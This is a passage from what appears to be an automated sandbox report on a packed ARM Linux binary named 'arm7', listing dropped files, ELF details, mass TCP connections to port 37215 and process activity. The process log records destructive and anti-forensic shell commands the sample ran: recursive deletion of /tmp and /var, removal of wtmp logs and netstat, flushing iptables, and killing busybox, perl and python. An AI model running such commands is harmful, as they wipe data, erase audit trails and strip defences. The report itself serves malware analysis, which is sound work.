                                • 102.73.178.212
                                sora.x86Get hashmaliciousBrowse
                                • 160.165.145.22

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):10
                                Entropy (8bit):2.9219280948873623
                                Encrypted:false
                                SSDEEP:3:5bkPn:pkP
                                MD5:FF001A15CE15CF062A3704CEA2991B5F
                                SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
                                SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
                                SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: auto_null.
                                /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):18
                                Entropy (8bit):3.4613201402110088
                                Encrypted:false
                                SSDEEP:3:5bkrIZsXvn:pkckv
                                MD5:28FE6435F34B3367707BB1C5D5F6B430
                                SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
                                SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
                                SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: auto_null.monitor.
                                /proc/5365/oom_score_adj
                                Process:/usr/sbin/sshd
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):6
                                Entropy (8bit):1.7924812503605778
                                Encrypted:false
                                SSDEEP:3:ptn:Dn
                                MD5:CBF282CC55ED0792C33D10003D1F760A
                                SHA1:007DD8BD75468E6B7ABA4285E9B267202C7EAEED
                                SHA-256:FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
                                SHA-512:4643A8675D213C7DA35CC0C2BFB3B6F20324F9C48AEA7BA79F470615698C9A0CEFDA45CAA1957FC29110EE746BC8458AB8AB1E43EB513912A5E1E8858812CC00
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: -1000.
                                /run/sshd.pid
                                Process:/usr/sbin/sshd
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):5
                                Entropy (8bit):1.9219280948873623
                                Encrypted:false
                                SSDEEP:3:DTQv:P6
                                MD5:722854F46BE7C55F62C4033DA6ADE94B
                                SHA1:F74E66117C97C8CE0F8EEC94B7E2B92A9D38337F
                                SHA-256:E832BBB35129DD49811FBF5BA32A3611AC68E39C41F213A459E275ABBF1F5941
                                SHA-512:59CF8449A3AFF33E013E446F294A3C77EC973552A3C55C6B5C048EF7E62EEE5E4C3F08554E33D4016F6674389357393BB2568397D09FC067E557EF8D61D2251F
                                Malicious:false
                                Reputation:low
                                Preview: 5365.
                                /run/systemd/resolve/stub-resolv.conf
                                Process:/tmp/arm7
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):38
                                Entropy (8bit):3.3918926446809334
                                Encrypted:false
                                SSDEEP:3:KkZRAkd:KaAu
                                MD5:C7EA09D26E26605227076E0514A33038
                                SHA1:C3F9736E9AF7BD0885578859A50B205C8FA5FC8E
                                SHA-256:7E8AD76E0D200E93918CA2E93C99FF8ECD02071953BF1479819DB3AC0DBB6D07
                                SHA-512:17D0088725EB9991E9EB82E8A3DE0878E45E6F394BBC2AD260AA59C786FF0AD565E145E21256425D1C0ABE15F3ECB402EBB0A6A5E1C2D5BA7A4D95EC93A2861F
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: nameserver 8.8.8.8.nameserver 8.8.4.4.
                                /run/user/1000/pulse/pid
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):5
                                Entropy (8bit):2.321928094887362
                                Encrypted:false
                                SSDEEP:3:E8v:E+
                                MD5:CE7838A8404B6917B0897DCE5B6C7095
                                SHA1:AB43E603CAF13ABBBCD8EC9793F4ACE12EB09F0B
                                SHA-256:1828BE2C5CDA4C0CFE7F0F8ABC2AE26E377E9D0CC02937E18CADAF866F30994A
                                SHA-512:F0C4216DCC182947DC9765A97DFC8C1454A8C6C03D8D6E815C0F64ACD390131F4AB1CB722DA134887A259FA78B917CE4C85AC54537573CAA45017DCDF145F4B6
                                Malicious:false
                                Reputation:low
                                Preview: 5403.
                                /var/log/gpu-manager.log
                                Process:/usr/bin/gpu-manager
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):1515
                                Entropy (8bit):4.825813629825568
                                Encrypted:false
                                SSDEEP:24:wPXXX9uV6BNu3WDF3GF3XFFxFFed2uk2HUvJlfWkpPpx7uvvAdow9555Ro7uRkoT:wPXXXe6vejpeC2HUR5WkpPpcvAdow959
                                MD5:7B48386106F00126E44F428D0193E1ED
                                SHA1:75F652293B2DE03A845A73B678A5CB7E9701A9F4
                                SHA-256:9F60B5D0D5C6F6CB3892E1687D16333F36E3BD450713B00FDF0B2BB90EC7312C
                                SHA-512:57D0856EC65558B4A843A4696B644AC3E80B3EA0E6EC1C2FAC7A00015B96EBB2CC30967EB8DEFC3E648E59AC6882F6A4F69468D4B6CD0FD60F9F343C206DBFBC
                                Malicious:false
                                Preview: log_file: /var/log/gpu-manager.log.last_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.new_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.can't access /run/u-d-c-nvidia-was-loaded file.can't get module info via kmodcan't access /opt/amdgpu-pro/bin/amdgpu-pro-px.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/kernel.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/updates/dkms.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/kernel.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/updates/dkms.Is nvidia loaded? no.Was nvidia unloaded? no.Is nvidia blacklisted? no.Is intel loaded? no.Is radeon loaded? no.Is radeon blacklisted? no.Is amdgpu loaded? no.Is amdgpu blacklisted? no.Is amdgpu versioned? no.Is amdgpu pro stack? no.Is nouveau loaded? no.Is nouveau blacklisted? no.Is nvidia kernel module available? no.Is amdgpu kernel module available? no.Vendor/Device Id: 15ad:405.BusID "PCI:0@0:15:0".Is boot vga? yes.Error: can't acce
                                /var/run/gdm3.pid
                                Process:/usr/sbin/gdm3
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):5
                                Entropy (8bit):1.9219280948873623
                                Encrypted:false
                                SSDEEP:3:FSen:Z
                                MD5:E43A10DB72BACE9741B8591C226777AE
                                SHA1:3A02096DA23FDF8B108D6F96E6F73B38DE0654A6
                                SHA-256:49F4D88EF58629CFA6F9CB3F4732FDF8DA06E81FC81CDD3F7CAD8ABA69DC6C80
                                SHA-512:392400F7CC2B6282BE6691FE137FE96524540D811A76A61E85F7FB36CB175D22F9D2E282AAFA97884CD8F95E79A0ED5AC36A3368D57DF03C97FBACEA6917FDB0
                                Malicious:false
                                Preview: 5579.

                                Static File Info

                                General

                                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), statically linked, stripped
                                Entropy (8bit):7.988872339172871
                                TrID:
                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                File name:arm7
                                File size:77060
                                MD5:9fc0975479e319f970c96eded3c2d001
                                SHA1:ff77399d8fb757636a3eae4909dbc33f4a00f09e
                                SHA256:f0c7eb51c588fa50e39bee022ea2c4f602842012b01f2ee025b91eb5eb50782f
                                SHA512:76e5429bd9c9501324084d504173e79354d8f24dc1852c02d8d0d2d4fab7468b133488a88f9ad3cb74d02c5aa7784dfe1165469bdfc1acd38bc723c908dc6164
                                SSDEEP:1536:TT9/c4ITNRcVbXye47li0XD3tbBm3wvkte38LRdeU98ZMrk1LVon2dt9:VkeBXv4Bi0XD3xs3wsk8L7jjY7q2x
                                File Content Preview:.ELF..............(.....8S..4...........4. ...(.....................%...%...............p'..p...p...................Q.td............................?..`UPX!.........2...2......k..........?.E.h;....#..$...o...m.W.l...ef?....$m.;I....j..8....+}.?..`.j.oB.!.

                                Static ELF Info

                                ELF header

                                Class:ELF32
                                Data:2's complement, little endian
                                Version:1 (current)
                                Machine:ARM
                                Version Number:0x1
                                Type:EXEC (Executable file)
                                OS/ABI:UNIX - Linux
                                ABI Version:0
                                Entry Point Address:0x15338
                                Flags:0x4000002
                                ELF Header Size:52
                                Program Header Offset:52
                                Program Header Size:32
                                Number of Program Headers:3
                                Section Header Offset:0
                                Section Header Size:40
                                Number of Section Headers:0
                                Header String Table Index:0

                                Program Segments

                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                LOAD0x00x80000x80000xe5250xe5254.02000x5R E0x8000
                                LOAD0x27700x3a7700x3a7700x00x00.00000x6RW 0x8000
                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 11, 2021 03:08:09.822506905 CET2419737215192.168.2.23197.27.35.12
                                Nov 11, 2021 03:08:09.822592020 CET2419737215192.168.2.23156.206.45.17
                                Nov 11, 2021 03:08:09.822593927 CET2419737215192.168.2.2341.223.38.12
                                Nov 11, 2021 03:08:09.822607040 CET2419737215192.168.2.23197.103.171.13
                                Nov 11, 2021 03:08:09.822614908 CET2419737215192.168.2.23156.106.106.123
                                Nov 11, 2021 03:08:09.822648048 CET2419737215192.168.2.23156.56.62.32
                                Nov 11, 2021 03:08:09.822647095 CET2419737215192.168.2.23197.148.150.72
                                Nov 11, 2021 03:08:09.822671890 CET2419737215192.168.2.23156.85.150.89
                                Nov 11, 2021 03:08:09.822685003 CET2419737215192.168.2.23156.158.36.3
                                Nov 11, 2021 03:08:09.822684050 CET2419737215192.168.2.23197.33.236.165
                                Nov 11, 2021 03:08:09.822700977 CET2419737215192.168.2.23156.6.117.221
                                Nov 11, 2021 03:08:09.822720051 CET2419737215192.168.2.2341.213.70.88
                                Nov 11, 2021 03:08:09.822722912 CET2419737215192.168.2.23197.207.114.50
                                Nov 11, 2021 03:08:09.822724104 CET2419737215192.168.2.2341.216.202.144
                                Nov 11, 2021 03:08:09.822746038 CET2419737215192.168.2.23156.44.151.171
                                Nov 11, 2021 03:08:09.822752953 CET2419737215192.168.2.23197.57.109.100
                                Nov 11, 2021 03:08:09.822758913 CET2419737215192.168.2.23156.140.26.188
                                Nov 11, 2021 03:08:09.822766066 CET2419737215192.168.2.23197.60.153.1
                                Nov 11, 2021 03:08:09.824300051 CET2419737215192.168.2.23156.246.44.139
                                Nov 11, 2021 03:08:09.824304104 CET2419737215192.168.2.23197.26.196.153
                                Nov 11, 2021 03:08:09.824314117 CET2419737215192.168.2.2341.6.66.211
                                Nov 11, 2021 03:08:09.824331999 CET2419737215192.168.2.2341.95.96.83
                                Nov 11, 2021 03:08:09.824336052 CET2419737215192.168.2.23156.216.219.44
                                Nov 11, 2021 03:08:09.824345112 CET2419737215192.168.2.2341.229.33.193
                                Nov 11, 2021 03:08:09.824362040 CET2419737215192.168.2.23197.71.118.104
                                Nov 11, 2021 03:08:09.824368954 CET2419737215192.168.2.2341.231.138.107
                                Nov 11, 2021 03:08:09.824383974 CET2419737215192.168.2.2341.214.230.97
                                Nov 11, 2021 03:08:09.824392080 CET2419737215192.168.2.23197.76.34.188
                                Nov 11, 2021 03:08:09.824397087 CET2419737215192.168.2.23156.191.121.146
                                Nov 11, 2021 03:08:09.824402094 CET2419737215192.168.2.23197.141.199.13
                                Nov 11, 2021 03:08:09.824404955 CET2419737215192.168.2.2341.239.199.243
                                Nov 11, 2021 03:08:09.824419975 CET2419737215192.168.2.2341.164.189.192
                                Nov 11, 2021 03:08:09.824419975 CET2419737215192.168.2.23156.55.170.229
                                Nov 11, 2021 03:08:09.824423075 CET2419737215192.168.2.23197.197.25.80
                                Nov 11, 2021 03:08:09.824428082 CET2419737215192.168.2.2341.41.41.23
                                Nov 11, 2021 03:08:09.824435949 CET2419737215192.168.2.23197.186.193.155
                                Nov 11, 2021 03:08:09.824445963 CET2419737215192.168.2.2341.150.131.120
                                Nov 11, 2021 03:08:09.824460030 CET2419737215192.168.2.2341.20.36.229
                                Nov 11, 2021 03:08:09.824474096 CET2419737215192.168.2.2341.224.88.73
                                Nov 11, 2021 03:08:09.824490070 CET2419737215192.168.2.23156.96.137.169
                                Nov 11, 2021 03:08:09.824518919 CET2419737215192.168.2.2341.93.81.214
                                Nov 11, 2021 03:08:09.824523926 CET2419737215192.168.2.2341.39.37.132
                                Nov 11, 2021 03:08:09.824537039 CET2419737215192.168.2.23156.116.228.254
                                Nov 11, 2021 03:08:09.824556112 CET2419737215192.168.2.23197.75.39.78
                                Nov 11, 2021 03:08:09.824578047 CET2419737215192.168.2.23156.142.7.180
                                Nov 11, 2021 03:08:09.824579954 CET2419737215192.168.2.23197.166.28.247
                                Nov 11, 2021 03:08:09.824583054 CET2419737215192.168.2.23197.55.1.205
                                Nov 11, 2021 03:08:09.824594021 CET2419737215192.168.2.23197.236.107.244
                                Nov 11, 2021 03:08:09.824596882 CET2419737215192.168.2.23197.134.150.205
                                Nov 11, 2021 03:08:09.824611902 CET2419737215192.168.2.23197.75.45.63
                                Nov 11, 2021 03:08:09.824619055 CET2419737215192.168.2.2341.97.121.49
                                Nov 11, 2021 03:08:09.824623108 CET2419737215192.168.2.2341.79.153.59
                                Nov 11, 2021 03:08:09.824641943 CET2419737215192.168.2.2341.143.216.135
                                Nov 11, 2021 03:08:09.824654102 CET2419737215192.168.2.23197.77.90.90
                                Nov 11, 2021 03:08:09.824656963 CET2419737215192.168.2.2341.224.246.12
                                Nov 11, 2021 03:08:09.824666023 CET2419737215192.168.2.2341.64.62.145
                                Nov 11, 2021 03:08:09.824680090 CET2419737215192.168.2.2341.214.81.41
                                Nov 11, 2021 03:08:09.824702978 CET2419737215192.168.2.23197.138.248.159
                                Nov 11, 2021 03:08:09.824707031 CET2419737215192.168.2.23197.244.20.218
                                Nov 11, 2021 03:08:09.824708939 CET2419737215192.168.2.2341.119.144.123
                                Nov 11, 2021 03:08:09.824719906 CET2419737215192.168.2.23156.239.140.25
                                Nov 11, 2021 03:08:09.824738979 CET2419737215192.168.2.2341.204.192.137
                                Nov 11, 2021 03:08:09.824743986 CET2419737215192.168.2.23197.246.108.176
                                Nov 11, 2021 03:08:09.824749947 CET2419737215192.168.2.2341.192.226.216
                                Nov 11, 2021 03:08:09.824762106 CET2419737215192.168.2.2341.24.187.111
                                Nov 11, 2021 03:08:09.824769974 CET2419737215192.168.2.23156.254.114.228
                                Nov 11, 2021 03:08:09.824769974 CET2419737215192.168.2.23197.41.249.147
                                Nov 11, 2021 03:08:09.824781895 CET2419737215192.168.2.23156.27.9.249
                                Nov 11, 2021 03:08:09.824783087 CET2419737215192.168.2.23197.232.64.13
                                Nov 11, 2021 03:08:09.824809074 CET2419737215192.168.2.2341.124.118.94
                                Nov 11, 2021 03:08:09.824815035 CET2419737215192.168.2.23156.139.226.180
                                Nov 11, 2021 03:08:09.824820995 CET2419737215192.168.2.23156.243.66.100
                                Nov 11, 2021 03:08:09.824825048 CET2419737215192.168.2.23156.145.114.127
                                Nov 11, 2021 03:08:09.824842930 CET2419737215192.168.2.2341.28.31.46
                                Nov 11, 2021 03:08:09.824848890 CET2419737215192.168.2.23197.245.234.241
                                Nov 11, 2021 03:08:09.824862957 CET2419737215192.168.2.2341.83.166.8
                                Nov 11, 2021 03:08:09.824867010 CET2419737215192.168.2.23197.200.141.48
                                Nov 11, 2021 03:08:09.824872017 CET2419737215192.168.2.2341.29.252.9
                                Nov 11, 2021 03:08:09.824883938 CET2419737215192.168.2.23156.133.12.80
                                Nov 11, 2021 03:08:09.824888945 CET2419737215192.168.2.23197.218.24.30
                                Nov 11, 2021 03:08:09.824893951 CET2419737215192.168.2.23156.165.201.248
                                Nov 11, 2021 03:08:09.824894905 CET2419737215192.168.2.23197.81.191.6
                                Nov 11, 2021 03:08:09.824898958 CET2419737215192.168.2.23197.113.216.22
                                Nov 11, 2021 03:08:09.824903011 CET2419737215192.168.2.23156.135.124.213
                                Nov 11, 2021 03:08:09.824909925 CET2419737215192.168.2.23156.170.250.174
                                Nov 11, 2021 03:08:09.824934006 CET2419737215192.168.2.23156.230.63.127
                                Nov 11, 2021 03:08:09.824949026 CET2419737215192.168.2.2341.154.234.25
                                Nov 11, 2021 03:08:09.824955940 CET2419737215192.168.2.2341.91.81.20
                                Nov 11, 2021 03:08:09.824970961 CET2419737215192.168.2.23156.168.61.231
                                Nov 11, 2021 03:08:09.824973106 CET2419737215192.168.2.23156.137.187.229
                                Nov 11, 2021 03:08:09.824976921 CET2419737215192.168.2.2341.229.150.53
                                Nov 11, 2021 03:08:09.824991941 CET2419737215192.168.2.2341.178.245.173
                                Nov 11, 2021 03:08:09.825004101 CET2419737215192.168.2.2341.52.27.65
                                Nov 11, 2021 03:08:09.825006008 CET2419737215192.168.2.23197.89.1.209
                                Nov 11, 2021 03:08:09.825028896 CET2419737215192.168.2.2341.202.146.171
                                Nov 11, 2021 03:08:09.825043917 CET2419737215192.168.2.23156.243.59.174
                                Nov 11, 2021 03:08:09.825050116 CET2419737215192.168.2.23156.29.6.54
                                Nov 11, 2021 03:08:09.825054884 CET2419737215192.168.2.2341.58.85.9
                                Nov 11, 2021 03:08:09.825067043 CET2419737215192.168.2.2341.58.156.182
                                Nov 11, 2021 03:08:09.825094938 CET2419737215192.168.2.23156.76.181.61

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Nov 11, 2021 03:08:56.256854057 CET192.168.2.238.8.8.80x553fStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)
                                Nov 11, 2021 03:08:56.256911039 CET192.168.2.238.8.8.80xd530Standard query (0)daisy.ubuntu.com28IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Nov 11, 2021 03:08:56.273183107 CET8.8.8.8192.168.2.230x553fNo error (0)daisy.ubuntu.com162.213.33.108A (IP address)IN (0x0001)
                                Nov 11, 2021 03:08:56.273183107 CET8.8.8.8192.168.2.230x553fNo error (0)daisy.ubuntu.com162.213.33.132A (IP address)IN (0x0001)

                                System Behavior

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:/tmp/arm7
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:09
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /tmp/arm7 /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf /var/log/wtmp"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /var/log/wtmp
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf /tmp/*"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /tmp/*
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:20
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf /bin/netstat"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /bin/netstat
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "iptables -F"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/usr/sbin/iptables
                                Arguments:iptables -F
                                File size:99296 bytes
                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "pkill -9 busybox"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:21
                                Start date:11/11/2021
                                Path:/usr/bin/pkill
                                Arguments:pkill -9 busybox
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:08:23
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:23
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "pkill -9 perl"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:23
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:23
                                Start date:11/11/2021
                                Path:/usr/bin/pkill
                                Arguments:pkill -9 perl
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:08:25
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:25
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "pkill -9 python"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:25
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:25
